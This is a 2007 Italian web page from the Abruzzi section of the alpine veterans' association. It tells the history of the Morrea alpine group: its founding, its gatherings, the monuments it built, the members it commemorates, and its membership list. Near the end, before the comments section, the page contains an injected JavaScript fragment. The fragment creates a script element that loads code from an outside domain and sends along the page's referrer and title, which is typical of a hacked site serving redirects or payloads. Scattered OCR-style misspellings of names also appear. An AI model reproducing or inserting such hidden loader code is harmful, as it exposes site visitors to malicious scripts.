A.N.A. Sezione Abruzzi

MORREA

giugno 7th, 2007  |  Published in I gruppi della Sezione Abruzzi

Il Gruppo Alpini di Morrea nasce, su iniziativa dell'ex alpino Corradi Gregorio unitamente ad altri ex Alpini, suoi compaesani, il 18 aprile 1992.

All'atto della sua nascita il Gruppo era composto da 30 soci.

Il primo Direttivo venne formato dal capogruppo Corradi Gregorio, dal vicecapogruppo Baldassarre Alfredo, dai consiglieri Sarrecchia Fausto, Siciliani Pio e dal tesoriere Corradi Ga­briele.

Tale Direttivo, rinnovato annualmente, è ancora in carica.

Il motivo per il quale anche il Gruppo Alpini di Morrea è entrato a far parte di quella grande famiglia di Alpini che è l'ANA è presto detto: Morrea, infatti, piccola frazione del Comune di San Vincenzo Valle Roveto (AQ), ha dato alla Nazione, in termini di "chiamata alle armi", molti giovani; la maggior parte dei quali è stata assegnata ai reparti alpini; naturale quindi, se non addirittura obbligatorio, che anche Monca avesse il suo Gruppo Alpini.

Il Gruppo ha iniziato la sua attività sotto la presidenza di A. Carnevale; ha partecipato massicciamente ai vari raduni sezionali: San Salvo, Pescina, Avezzano, ecc. senza dimenticare quello eccezionale di Campo Imperatore con la presenza del Santo Padre.

Non ha trascurato le varie adunate nazionali inviando sempre una sua rappresentanza. E' stato sempre presente, salvo rare eccezioni, ai molteplici raduni di zona che annualmente la Sezione ha posto in calendario; non ha potuto partecipare operativamente alle iniziative umani­tarie (Rossoch, Romail, ecc) proposte dalla Sezione, in quanto il 90% dei soci non è residente in loco, ma ha comunque contribuito economicamente con grande spirito di solidarietà.

Nel 1994 gli Alpini di Monca parteciparono alla Commemorazione del "50° Anniversario" della fucilazione del loro compaesano Giuseppe Testa M.D.V.M. della Resistenza, prima recan­dosi ad Alvito (FR), sul luogo del martirio perpetrato dalla barbaria tedesca I'll maggio 1944 e successivamente a Monca, dove il Monumento a lui dedicato si erge ad esempio insieme ai nomi di tanti altri compaesani, Alpini e non, caduti nel compimento del loro dovere nelle due guerre mondia­li.

Nel 1995 il Gruppo ottenne dalla Sezione il nulla osta per poter organizzare il suo primo "Raduno di zona" e grazie all'apporto dato dall'allora presidente O. Capannolo, a cui oggi va il mio più sentito ringraziamento, il Gruppo, con spirito di sacrificio economico ed organizzativo, riuscì nel suo intento.

Parteciparono al Raduno due presidenti di Sezione: O. Capannolo della Sezione Abruzzi e
N. Corradetti della Sezione di Latina, 18 Gruppi Alpini, Autorità civili e militari, (13 agosto 1995).
E' prassi ormai consolidata che nei Raduni di zona i Gruppi organizzatori sentano la neces‑
sità di lasciare un impronta dell'evento, magari inaugurando un Monumento all'Alpino, oppure
restaurando una chiesetta alpina o ancora compiendo opere che tornino utili alla società. Iniziative, insomma, che rimarchino 1' alpinità dei Gruppi; è per questo che il Gruppo Alpini di Monca nell'occasione ha voluto e realizzato con le proprie mani, un Monumento dedicato al carabiniere Franco Corradi M.D.V.C. caduto durante l'adempimento del proprio dovere il 25 luglio 1970.
Nel ringraziare tutti i soci che in quell'occasione si sono impegnati, mi è doveroso ricordare, con sincera commozione, due soci che, come usiamo dire noi Alpini "sono andati avanti", e mi riferisco agli alpini Pasquale Corradi e Giuseppe Baldassarre, che con grande abnegazione hanno contribuito alla vita del Gruppo e che insieme ai soci Guido Casalvieri, Luigi Corradi, Pasquale Corradi fu Alfonso sono stati insigniti della Croce di Guerra per aver partecipato, nella Seconda Guerra Mondiale, alle operazioni militari sul fronte greco- albanese. Mi sia consentito di rivolgere un doveroso pensiero a tutti quegli ex Alpini, miei compaesani, deceduti prima della costituzione del Gruppo, come Pasquale Baldassarre genitore del socio Luigi Baldassarre, Arziere Corradi genitore del socio Maurizio Corradi e fratello del socio Giocondo Corradi, insignito di Onorificenza al Merito in seguito alla tragica morte avvenuta sul lavoro; e a tutti quegli Alpini, che pur non ricordando i nomi, con le loro gesta hanno onorato Monca.

Per concludere, il mio augurio più sentito è quello che questo Gruppo seguiti con più forza e tenacia a tenere alto il senso di alpinità, contribuendo così a rendere la Sezione Abruzzi forte, numerosa e compatta come lo è sempre stata in questi suoi 70 anni di vita.

ELENCO ATTUALE DEI SOCI

Baldassarre Achille, Baldassarre Alfredo, Baldassarre Luigi, Baldassarre Nino, Baldassarre Pietro, Baldassarre Pietro, Baldassarre Remo, Baldassarre Sante, Casalvieri Guido, Corradi Antonio, Corradi Carlo, Corradi Franco, Corradi Gabriele, Conadi Giocondo, Corradi Gregorio, Corradi Luigi, Corradi Maurizio, Corradi Pasquale, Corradi Terenzio, Piccinini Franco, Sarrecchia Fausto, Sarrecchia Francesco, Sarrecchia Luigi, Siciliani Pio.

 

Il capo gruppo
Gregorio Conadi


 

Il gruppo in esame alla fine dell'anno 2007 registra i seguenti soci:

  • – Soci alpini nr. 25;
  • – Soci aggregati nr. 13.

Il Capo Gruppo è il Signor  Carlo Mario CORRADI.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);

Your Comments

L’Alpino d’Abruzzo